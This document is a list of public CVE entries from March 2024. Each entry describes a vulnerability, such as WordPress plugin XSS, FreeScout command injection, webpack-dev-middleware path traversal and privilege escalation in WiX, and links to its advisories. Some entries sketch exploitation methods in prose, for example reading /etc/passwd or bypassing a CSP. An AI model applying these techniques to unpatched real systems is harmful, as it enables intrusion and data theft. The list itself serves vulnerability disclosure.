CVE    2024    29195    Candidate    The azure-c-shared-utility is a C library for AMQP/MQTT communication to Azure Cloud Services. This library may be used by the Azure IoT C SDK for communication between IoT Hub and IoT Hub devices. An attacker can cause an integer wraparound or under-allocation or heap buffer overflow due to vulnerabilities in the parameter checking mechanism, by exploiting the buffer length parameter in Azure C SDK, which may lead to remote code execution. Requirements for RCE are 1. Compromised Azure account allowing malformed payloads to be sent to the device via IoT Hub service, 2. Bypassing the IoT Hub service max message payload limit of 128KB, and 3. Ability to overwrite code space with remote code. Fixed in commit https://github.com/Azure/azure-c-shared-utility/commit/1129147c38ac02ad974c4c701a1e01b2141b9fe2.    MISC:https://github.com/Azure/azure-c-shared-utility/commit/1129147c38ac02ad974c4c701a1e01b2141b9fe2   |   URL:https://github.com/Azure/azure-c-shared-utility/commit/1129147c38ac02ad974c4c701a1e01b2141b9fe2   |   MISC:https://github.com/Azure/azure-c-shared-utility/security/advisories/GHSA-m8wp-hc7w-x4xg   |   URL:https://github.com/Azure/azure-c-shared-utility/security/advisories/GHSA-m8wp-hc7w-x4xg    Assigned (20240318)
CVE    2024    29194    Candidate    OneUptime is a solution for monitoring and managing online services. The vulnerability lies in the improper validation of client-side stored data within the web application. Specifically, the is_master_admin key, stored in the local storage of the browser, can be manipulated by an attacker. By changing this key from false to true, the application grants administrative privileges to the user, without proper server-side validation. This has been patched in 7.0.1815.    MISC:https://github.com/OneUptime/oneuptime/commit/14016d23d834038dd65d3a96cf71af04b556a32c   |   URL:https://github.com/OneUptime/oneuptime/commit/14016d23d834038dd65d3a96cf71af04b556a32c   |   MISC:https://github.com/OneUptime/oneuptime/security/advisories/GHSA-246p-xmg8-wmcq   |   URL:https://github.com/OneUptime/oneuptime/security/advisories/GHSA-246p-xmg8-wmcq    Assigned (20240318)
CVE    2024    29190    Candidate    Mobile Security Framework (MobSF) is a pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis. In version 3.9.5 Beta and prior, MobSF does not perform any input validation when extracting the hostnames in `android:host`, so requests can also be sent to local hostnames. This can lead to server-side request forgery. An attacker can cause the server to make a connection to internal-only services within the organization's infrastructure. Commit 5a8eeee73c5f504a6c3abdf2a139a13804efdb77 has a hotfix for this issue.    MISC:https://drive.google.com/file/d/1nbKMd2sKosbJef5Mh4DxjcHcQ8Hw0BNR/view?usp=share_link   |   URL:https://drive.google.com/file/d/1nbKMd2sKosbJef5Mh4DxjcHcQ8Hw0BNR/view?usp=share_link   |   MISC:https://github.com/MobSF/Mobile-Security-Framework-MobSF/commit/5a8eeee73c5f504a6c3abdf2a139a13804efdb77   |   URL:https://github.com/MobSF/Mobile-Security-Framework-MobSF/commit/5a8eeee73c5f504a6c3abdf2a139a13804efdb77   |   MISC:https://github.com/MobSF/Mobile-Security-Framework-MobSF/security/advisories/GHSA-wfgj-wrgh-h3r3   |   URL:https://github.com/MobSF/Mobile-Security-Framework-MobSF/security/advisories/GHSA-wfgj-wrgh-h3r3    Assigned (20240318)
CVE    2024    29189    Candidate    PyAnsys Geometry is a Python client library for the Ansys Geometry service and other CAD Ansys products. In the file src/ansys/geometry/core/connection/product_instance.py, by calling the method _start_program directly, users could exploit its usage to perform malicious operations on the machine where the script is run. This vulnerability is fixed in 0.3.3 and 0.4.12.    MISC:https://bandit.readthedocs.io/en/1.7.8/plugins/b602_subprocess_popen_with_shell_equals_true.html   |   URL:https://bandit.readthedocs.io/en/1.7.8/plugins/b602_subprocess_popen_with_shell_equals_true.html   |   MISC:https://github.com/ansys/pyansys-geometry/blob/52cba1737a8a7812e5430099f715fa2160ec007b/src/ansys/geometry/core/connection/product_instance.py#L403-L428   |   URL:https://github.com/ansys/pyansys-geometry/blob/52cba1737a8a7812e5430099f715fa2160ec007b/src/ansys/geometry/core/connection/product_instance.py#L403-L428   |   MISC:https://github.com/ansys/pyansys-geometry/commit/902071701c4f3a8258cbaa46c28dc0a65442d1bc   |   URL:https://github.com/ansys/pyansys-geometry/commit/902071701c4f3a8258cbaa46c28dc0a65442d1bc   |   MISC:https://github.com/ansys/pyansys-geometry/commit/f82346b9432b06532e84f3278125f5879b4e9f3f   |   URL:https://github.com/ansys/pyansys-geometry/commit/f82346b9432b06532e84f3278125f5879b4e9f3f   |   MISC:https://github.com/ansys/pyansys-geometry/pull/1076   |   URL:https://github.com/ansys/pyansys-geometry/pull/1076   |   MISC:https://github.com/ansys/pyansys-geometry/pull/1077   |   URL:https://github.com/ansys/pyansys-geometry/pull/1077   |   MISC:https://github.com/ansys/pyansys-geometry/security/advisories/GHSA-38jr-29fh-w9vm   |   URL:https://github.com/ansys/pyansys-geometry/security/advisories/GHSA-38jr-29fh-w9vm    Assigned (20240318)
CVE    2024    29188    Candidate    WiX toolset lets developers create installers for Windows Installer, the Windows installation engine. The custom action behind WiX's `RemoveFolderEx` functionality could allow a standard user to delete protected directories. `RemoveFolderEx` deletes an entire directory tree during installation or uninstallation. It does so by recursing every subdirectory starting at a specified directory and adding each subdirectory to the list of directories Windows Installer should delete. If the setup author instructed `RemoveFolderEx` to delete a per-user folder from a per-machine installer, an attacker could create a directory junction in that per-user folder pointing to a per-machine, protected directory. Windows Installer, when executing the per-machine installer after approval by an administrator, would delete the target of the directory junction. This vulnerability is fixed in 3.14.1 and 4.0.5.    MISC:https://github.com/wixtoolset/issues/security/advisories/GHSA-jx4p-m4wm-vvjg   |   URL:https://github.com/wixtoolset/issues/security/advisories/GHSA-jx4p-m4wm-vvjg   |   MISC:https://github.com/wixtoolset/wix/commit/2e5960b575881567a8807e6b8b9c513138b19742   |   URL:https://github.com/wixtoolset/wix/commit/2e5960b575881567a8807e6b8b9c513138b19742   |   MISC:https://github.com/wixtoolset/wix3/commit/93eeb5f6835776694021f66d4226c262c67d487a   |   URL:https://github.com/wixtoolset/wix3/commit/93eeb5f6835776694021f66d4226c262c67d487a    Assigned (20240318)
CVE    2024    29187    Candidate    WiX toolset lets developers create installers for Windows Installer, the Windows installation engine. When a bundle runs as SYSTEM user, Burn uses GetTempPathW which points to an insecure directory C:\Windows\Temp to drop and load multiple binaries. Standard users can hijack the binary before it's loaded in the application resulting in elevation of privileges. This vulnerability is fixed in 3.14.1 and 4.0.5.    MISC:https://github.com/wixtoolset/issues/security/advisories/GHSA-rf39-3f98-xr7r   |   URL:https://github.com/wixtoolset/issues/security/advisories/GHSA-rf39-3f98-xr7r   |   MISC:https://github.com/wixtoolset/wix/commit/75a8c75d4e02ea219008dc5af7d03869291d61f7   |   URL:https://github.com/wixtoolset/wix/commit/75a8c75d4e02ea219008dc5af7d03869291d61f7   |   MISC:https://github.com/wixtoolset/wix3/commit/6d372e5169f1a334a395cdf496443bc0732098e9   |   URL:https://github.com/wixtoolset/wix3/commit/6d372e5169f1a334a395cdf496443bc0732098e9    Assigned (20240318)
CVE    2024    29186    Candidate    Bref is an open-source project that helps users go serverless on Amazon Web Services with PHP. When Bref prior to version 2.1.17 is used with the Event-Driven Function runtime and the handler is a `RequestHandlerInterface`, then the Lambda event is converted to a PSR7 object. During the conversion process, if the request is a MultiPart, each part is parsed. In the parsing process, the `Content-Type` header of each part is read using the `Riverline/multipart-parser` library. The library, in the `StreamedPart::parseHeaderContent` function, performs slow multi-byte string operations on the header value. Precisely, the `mb_convert_encoding` function is used with the first (`$string`) and third (`$from_encoding`) parameters read from the header value. An attacker could send specially crafted requests which would force the server into performing long operations with a consequent long billed duration. The attack has the following requirements and limitations: The Lambda should use the Event-Driven Function runtime and the `RequestHandlerInterface` handler and should implement at least one endpoint accepting POST requests; the attacker can send requests up to 6MB long (this is enough to cause a billed duration between 400ms and 500ms with the default 1024MB RAM Lambda image of Bref); and if the Lambda uses a PHP runtime <= php-82, the impact is higher as the billed duration in the default 1024MB RAM Lambda image of Bref could be brought to more than 900ms for each request. Notice that the vulnerability applies only to headers read from the request body as the request header has a limitation which allows a total maximum size of ~10KB. Version 2.1.17 contains a fix for this issue.    MISC:https://github.com/brefphp/bref/commit/5f7c0294628dbcec6305f638ff7e2dba8a1c2f45   |   URL:https://github.com/brefphp/bref/commit/5f7c0294628dbcec6305f638ff7e2dba8a1c2f45   |   MISC:https://github.com/brefphp/bref/security/advisories/GHSA-j4hq-f63x-f39r   |   URL:https://github.com/brefphp/bref/security/advisories/GHSA-j4hq-f63x-f39r    Assigned (20240318)
CVE    2024    29185    Candidate    FreeScout is a self-hosted help desk and shared mailbox. Versions prior to 1.8.128 are vulnerable to OS Command Injection in the /public/tools.php source file. The value of the php_path parameter is being executed as an OS command by the shell_exec function, without validating it. This allows an adversary to execute malicious OS commands on the server. A practical demonstration of the successful command injection attack extracted the /etc/passwd file of the server. This represented the complete compromise of the server hosting the FreeScout application. This attack requires an attacker to know the `App_Key` of the application. This limitation makes the Attack Complexity High. If an attacker gets hold of the `App_Key`, the attacker can compromise the complete server on which the application is deployed. Version 1.8.128 contains a patch for this issue.    MISC:https://github.com/freescout-helpdesk/freescout/security/advisories/GHSA-7p9x-ch4c-vqj9   |   URL:https://github.com/freescout-helpdesk/freescout/security/advisories/GHSA-7p9x-ch4c-vqj9    Assigned (20240318)
CVE    2024    29184    Candidate    FreeScout is a self-hosted help desk and shared mailbox. A Stored Cross-Site Scripting (XSS) vulnerability has been identified within the Signature Input Field of the FreeScout Application prior to version 1.8.128. Stored XSS occurs when user input is not properly sanitized and is stored on the server, allowing an attacker to inject malicious scripts that will be executed when other users access the affected page. In this case, the Support Agent User can inject malicious scripts into their signature, which will then be executed when viewed by the Administrator. The application protects users against XSS attacks by enforcing a CSP policy. The CSP policy is: `script-src 'self' 'nonce-abcd'`. The CSP policy only allows the inclusion of JS files that are present on the application server and doesn't allow any inline script or script other than nonce-abcd. The CSP policy was bypassed by uploading a JS file to the server by a POST request to /conversation/upload endpoint. After this, a working XSS payload was crafted by including the uploaded JS file link as the src of the script. This bypassed the CSP policy and XSS attacks became possible. The impact of this vulnerability is severe as it allows an attacker to compromise the FreeScout Application. By exploiting this vulnerability, the attacker can perform various malicious actions such as forcing the Administrator to execute actions without their knowledge or consent. For instance, the attacker can force the Administrator to add a new administrator controlled by the attacker, thereby giving the attacker full control over the application. Alternatively, the attacker can elevate the privileges of a low-privileged user to Administrator, further compromising the security of the application. Attackers can steal sensitive information such as login credentials, session tokens, personally identifiable information (PII), and financial data. The vulnerability can also lead to defacement of the Application. Version 1.8.128 contains a patch for this issue.    MISC:https://github.com/freescout-helpdesk/freescout/security/advisories/GHSA-fffc-phh8-5h4v   |   URL:https://github.com/freescout-helpdesk/freescout/security/advisories/GHSA-fffc-phh8-5h4v    Assigned (20240318)
CVE    2024    29180    Candidate    Prior to versions 7.1.0, 6.1.2, and 5.3.4, the webpack-dev-middleware development middleware for webpack does not validate the supplied URL address sufficiently before returning the local file. It is possible to access any file on the developer's machine. The middleware can either work with the physical filesystem when reading the files or it can use a virtualized in-memory `memfs` filesystem. If the `writeToDisk` configuration option is set to `true`, the physical filesystem is used. The `getFilenameFromUrl` method is used to parse the URL and build the local file path. The public path prefix is stripped from the URL, and the `unescaped` path suffix is appended to the `outputPath`. As the URL is not unescaped and normalized automatically before calling the middleware, it is possible to use `%2e` and `%2f` sequences to perform a path traversal attack. Developers using `webpack-dev-server` or `webpack-dev-middleware` are affected by the issue. When the project is started, an attacker might access any file on the developer's machine and exfiltrate the content. If the development server is listening on a public IP address (or `0.0.0.0`), an attacker on the local network can access the local files without any interaction from the victim (direct connection to the port). If the server allows access from third-party domains, an attacker can send a malicious link to the victim. When visited, the client side script can connect to the local server and exfiltrate the local files. Starting with fixed versions 7.1.0, 6.1.2, and 5.3.4, the URL is unescaped and normalized before any further processing.    MISC:https://github.com/webpack/webpack-dev-middleware/blob/7ed24e0b9f53ad1562343f9f517f0f0ad2a70377/src/utils/getFilenameFromUrl.js#L82   |   URL:https://github.com/webpack/webpack-dev-middleware/blob/7ed24e0b9f53ad1562343f9f517f0f0ad2a70377/src/utils/getFilenameFromUrl.js#L82   |   MISC:https://github.com/webpack/webpack-dev-middleware/blob/7ed24e0b9f53ad1562343f9f517f0f0ad2a70377/src/utils/setupOutputFileSystem.js#L21   |   URL:https://github.com/webpack/webpack-dev-middleware/blob/7ed24e0b9f53ad1562343f9f517f0f0ad2a70377/src/utils/setupOutputFileSystem.js#L21   |   MISC:https://github.com/webpack/webpack-dev-middleware/commit/189c4ac7d2344ec132a4689e74dc837ec5be0132   |   URL:https://github.com/webpack/webpack-dev-middleware/commit/189c4ac7d2344ec132a4689e74dc837ec5be0132   |   MISC:https://github.com/webpack/webpack-dev-middleware/commit/9670b3495da518fe667ff3428c5e4cb9f2f3d353   |   URL:https://github.com/webpack/webpack-dev-middleware/commit/9670b3495da518fe667ff3428c5e4cb9f2f3d353   |   MISC:https://github.com/webpack/webpack-dev-middleware/commit/e10008c762e4d5821ed6990348dabf0d4d93a10e   |   URL:https://github.com/webpack/webpack-dev-middleware/commit/e10008c762e4d5821ed6990348dabf0d4d93a10e   |   MISC:https://github.com/webpack/webpack-dev-middleware/releases/tag/v5.3.4   |   URL:https://github.com/webpack/webpack-dev-middleware/releases/tag/v5.3.4   |   MISC:https://github.com/webpack/webpack-dev-middleware/releases/tag/v6.1.2   |   URL:https://github.com/webpack/webpack-dev-middleware/releases/tag/v6.1.2   |   MISC:https://github.com/webpack/webpack-dev-middleware/releases/tag/v7.1.0   |   URL:https://github.com/webpack/webpack-dev-middleware/releases/tag/v7.1.0   |   MISC:https://github.com/webpack/webpack-dev-middleware/security/advisories/GHSA-wr3j-pwj9-hqq6   |   URL:https://github.com/webpack/webpack-dev-middleware/security/advisories/GHSA-wr3j-pwj9-hqq6    Assigned (20240318)
CVE    2024    29179    Candidate    phpMyFAQ is an open source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. An attacker with admin privileges can upload an attachment containing JS code without extension and the application will render it as HTML which allows for XSS attacks.    MISC:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-hm8r-95g3-5hj9   |   URL:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-hm8r-95g3-5hj9    Assigned (20240318)
CVE    2024    29156    Candidate    In OpenStack Murano through 16.0.0, when YAQL before 3.0.0 is used, the Murano service's MuranoPL extension to the YAQL language fails to sanitize the supplied environment, leading to potential leakage of sensitive service account information.    MISC:https://launchpad.net/bugs/2048114   |   MISC:https://opendev.org/openstack/murano/tags   |   MISC:https://opendev.org/openstack/yaql/commit/83e28324e1a0ce3970dd854393d2431123a909d3   |   MISC:https://wiki.openstack.org/wiki/OSSN/OSSN-0093    Assigned (20240318)
CVE    2024    29154    Candidate    danielmiessler fabric through 1.3.0 allows installer/client/gui/static/js/index.js XSS because of innerHTML mishandling, such as in htmlToPlainText.    MISC:https://sec1.io/security-advisories/cross-site-scripting-xss/    Assigned (20240318)
CVE    2024    29151    Candidate    Rocket.Chat.Audit through 5ad78e8 depends on filecachetools, which does not exist in PyPI.    MISC:https://github.com/RocketChat/Rocket.Chat.Audit/blob/5ad78e8017a9e190602e8257c22500ded0d931a9/requirements.txt#L3    Assigned (20240318)
CVE    2024    29143    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Cozmoslabs, sareiodata Passwordless Login passwordless-login allows Stored XSS. This issue affects Passwordless Login: from n/a through 1.1.2.    MISC:https://patchstack.com/database/vulnerability/passwordless-login/wordpress-passwordless-login-plugin-1-1-2-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/passwordless-login/wordpress-passwordless-login-plugin-1-1-2-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240317)
CVE    2024    29142    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WebberZone Better Search – Relevant search results for WordPress allows Stored XSS. This issue affects Better Search – Relevant search results for WordPress: from n/a through 3.3.0.    MISC:https://patchstack.com/database/vulnerability/better-search/wordpress-better-search-plugin-3-3-0-stored-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/better-search/wordpress-better-search-plugin-3-3-0-stored-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240317)
CVE    2024    29141    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PDF Embedder allows Stored XSS. This issue affects PDF Embedder: from n/a through 4.6.4.    MISC:https://patchstack.com/database/vulnerability/pdf-embedder/wordpress-pdf-embedder-plugin-4-6-4-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/pdf-embedder/wordpress-pdf-embedder-plugin-4-6-4-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240317)
CVE    2024    29140    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Matt Manning MJM Clinic allows Stored XSS. This issue affects MJM Clinic: from n/a through 1.1.22.    MISC:https://patchstack.com/database/vulnerability/mjm-clinic/wordpress-mjm-clinic-plugin-1-1-22-cross-site-scripting-xss-vulnerability-2?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/mjm-clinic/wordpress-mjm-clinic-plugin-1-1-22-cross-site-scripting-xss-vulnerability-2?_s_id=cve    Assigned (20240317)
CVE    2024    29139    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Mark Tilly MyCurator Content Curation allows Reflected XSS. This issue affects MyCurator Content Curation: from n/a through 3.76.    MISC:https://patchstack.com/database/vulnerability/mycurator/wordpress-mycurator-content-curation-plugin-3-76-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/mycurator/wordpress-mycurator-content-curation-plugin-3-76-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240317)
CVE    2024    29138    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in DEV Institute Restrict User Access – Membership Plugin with Force allows Reflected XSS. This issue affects Restrict User Access – Membership Plugin with Force: from n/a through 2.5.    MISC:https://patchstack.com/database/vulnerability/restrict-user-access/wordpress-restrict-user-access-plugin-2-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/restrict-user-access/wordpress-restrict-user-access-plugin-2-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240317)
CVE    2024    29137    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themefic Tourfic allows Reflected XSS. This issue affects Tourfic: from n/a through 2.11.7.    MISC:https://patchstack.com/database/vulnerability/tourfic/wordpress-tourfic-plugin-2-11-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/tourfic/wordpress-tourfic-plugin-2-11-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240317)
CVE    2024    29136    Candidate    Deserialization of Untrusted Data vulnerability in Themefic Tourfic. This issue affects Tourfic: from n/a through 2.11.17.    MISC:https://patchstack.com/database/vulnerability/tourfic/wordpress-tourfic-plugin-2-11-17-php-object-injection-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/tourfic/wordpress-tourfic-plugin-2-11-17-php-object-injection-vulnerability?_s_id=cve    Assigned (20240317)
CVE    2024    29135    Candidate    Unrestricted Upload of File with Dangerous Type vulnerability in Tourfic. This issue affects Tourfic: from n/a through 2.11.15.    MISC:https://patchstack.com/database/vulnerability/tourfic/wordpress-tourfic-plugin-2-11-15-arbitrary-file-upload-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/tourfic/wordpress-tourfic-plugin-2-11-15-arbitrary-file-upload-vulnerability?_s_id=cve    Assigned (20240317)
CVE    2024    29134    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themefic Tourfic allows Stored XSS. This issue affects Tourfic: from n/a through 2.11.8.    MISC:https://patchstack.com/database/vulnerability/tourfic/wordpress-tourfic-plugin-2-11-8-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/tourfic/wordpress-tourfic-plugin-2-11-8-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240317)
CVE    2024    29133    Candidate    Out-of-bounds Write vulnerability in Apache Commons Configuration. This issue affects Apache Commons Configuration: from 2.0 before 2.10.1. Users are recommended to upgrade to version 2.10.1, which fixes the issue.    MISC:https://lists.apache.org/thread/ccb9w15bscznh6tnp3wsvrrj9crbszh2   |   URL:https://lists.apache.org/thread/ccb9w15bscznh6tnp3wsvrrj9crbszh2    Assigned (20240317)
CVE    2024    29130    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Scott Paterson Contact Form 7 – PayPal & Stripe Add-on allows Reflected XSS. This issue affects Contact Form 7 – PayPal & Stripe Add-on: from n/a through 2.0.    MISC:https://patchstack.com/database/vulnerability/contact-form-7-paypal-add-on/wordpress-contact-form-7-paypal-stripe-add-on-plugin-2-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/contact-form-7-paypal-add-on/wordpress-contact-form-7-paypal-stripe-add-on-plugin-2-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240316)
CVE    2024    29129    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPLIT Pty Ltd OxyExtras allows Reflected XSS. This issue affects OxyExtras: from n/a through 1.4.4.    MISC:https://patchstack.com/database/vulnerability/oxyextras/wordpress-oxyextras-plugin-1-4-3-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/oxyextras/wordpress-oxyextras-plugin-1-4-3-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240316)
CVE    2024    29128    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Post SMTP POST SMTP allows Reflected XSS. This issue affects POST SMTP: from n/a through 2.8.6.    MISC:https://patchstack.com/database/vulnerability/post-smtp/wordpress-post-smtp-mailer-plugin-2-8-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/post-smtp/wordpress-post-smtp-mailer-plugin-2-8-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240316)
CVE    2024    29127    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in AAM Advanced Access Manager allows Reflected XSS. This issue affects Advanced Access Manager: from n/a through 6.9.20.    MISC:https://patchstack.com/database/vulnerability/advanced-access-manager/wordpress-advanced-access-manager-plugin-6-9-20-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/advanced-access-manager/wordpress-advanced-access-manager-plugin-6-9-20-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240316)
CVE    2024    29126    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jose Mortellaro Specific Content For Mobile – Customize the mobile version without redirections allows Reflected XSS. This issue affects Specific Content For Mobile – Customize the mobile version without redirections: from n/a through 0.1.9.5.    MISC:https://patchstack.com/database/vulnerability/specific-content-for-mobile/wordpress-specific-content-for-mobile-plugin-0-1-9-5-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/specific-content-for-mobile/wordpress-specific-content-for-mobile-plugin-0-1-9-5-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240316)
CVE    2024    29125    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Elliot Sowersby, RelyWP Coupon Affiliates allows Reflected XSS. This issue affects Coupon Affiliates: from n/a through 5.12.7.    MISC:https://patchstack.com/database/vulnerability/woo-coupon-usage/wordpress-coupon-affiliates-plugin-5-12-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/woo-coupon-usage/wordpress-coupon-affiliates-plugin-5-12-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240316)
CVE    2024    29124    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in AAM Advanced Access Manager allows Stored XSS. This issue affects Advanced Access Manager: from n/a through 6.9.20.    MISC:https://patchstack.com/database/vulnerability/advanced-access-manager/wordpress-advanced-access-manager-plugin-6-9-20-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/advanced-access-manager/wordpress-advanced-access-manager-plugin-6-9-20-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240316)
CVE    2024    29123    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Yannick Lefebvre Link Library allows Reflected XSS. This issue affects Link Library: from n/a through 7.6.    MISC:https://patchstack.com/database/vulnerability/link-library/wordpress-link-library-plugin-7-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/link-library/wordpress-link-library-plugin-7-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240316)
CVE    2024    29122    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Foliovision: Making the web work for you FV Flowplayer Video Player allows Stored XSS. This issue affects FV Flowplayer Video Player: from n/a through 7.5.41.7212.    MISC:https://patchstack.com/database/vulnerability/fv-wordpress-flowplayer/wordpress-fv-player-plugin-7-5-41-7212-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/fv-wordpress-flowplayer/wordpress-fv-player-plugin-7-5-41-7212-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240316)
CVE    2024    29121    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Firassaidi WooCommerce License Manager allows Reflected XSS. This issue affects WooCommerce License Manager: from n/a through 5.3.1.    MISC:https://patchstack.com/database/vulnerability/fs-license-manager/wordpress-woocommerce-license-manager-plugin-5-3-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/fs-license-manager/wordpress-woocommerce-license-manager-plugin-5-3-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240316)
CVE    2024    29118    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Scrollsequence allows Stored XSS. This issue affects Scrollsequence: from n/a through 1.5.4.    MISC:https://patchstack.com/database/vulnerability/scrollsequence/wordpress-scrollsequence-plugin-1-5-4-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/scrollsequence/wordpress-scrollsequence-plugin-1-5-4-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240315)
CVE    2024    29117    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Cimatti Consulting Contact Forms by Cimatti allows Stored XSS. This issue affects Contact Forms by Cimatti: from n/a through 1.7.0.    MISC:https://patchstack.com/database/vulnerability/contact-forms/wordpress-contact-forms-by-cimatti-plugin-1-7-0-unauthenticated-stored-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/contact-forms/wordpress-contact-forms-by-cimatti-plugin-1-7-0-unauthenticated-stored-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240315)
CVE    2024    29116    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in IconicWP WooThumbs for WooCommerce by Iconic allows Reflected XSS.This issue affects WooThumbs for WooCommerce by Iconic: from n/a through 5.5.3.    MISC:https://patchstack.com/database/vulnerability/iconic-woothumbs/wordpress-woothumbs-for-woocommerce-by-iconic-plugin-5-5-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/iconic-woothumbs/wordpress-woothumbs-for-woocommerce-by-iconic-plugin-5-5-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240315)
CVE    2024    29115    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Zaytech Smart Online Order for Clover allows Stored XSS.This issue affects Smart Online Order for Clover: from n/a through 1.5.5.    MISC:https://patchstack.com/database/vulnerability/clover-online-orders/wordpress-smart-online-order-for-clover-plugin-1-5-5-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/clover-online-orders/wordpress-smart-online-order-for-clover-plugin-1-5-5-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240315)
CVE    2024    29114    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in W3 Eden, Inc. Download Manager allows Stored XSS.This issue affects Download Manager: from n/a through 3.2.84.    MISC:https://patchstack.com/database/vulnerability/download-manager/wordpress-download-manager-plugin-3-2-84-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/download-manager/wordpress-download-manager-plugin-3-2-84-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240315)
CVE    2024    29113    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Metagauss RegistrationMagic allows Reflected XSS.This issue affects RegistrationMagic: from n/a through 5.2.5.9.    MISC:https://patchstack.com/database/vulnerability/custom-registration-form-builder-with-submission-manager/wordpress-registrationmagic-plugin-5-2-5-9-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/custom-registration-form-builder-with-submission-manager/wordpress-registrationmagic-plugin-5-2-5-9-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240315)
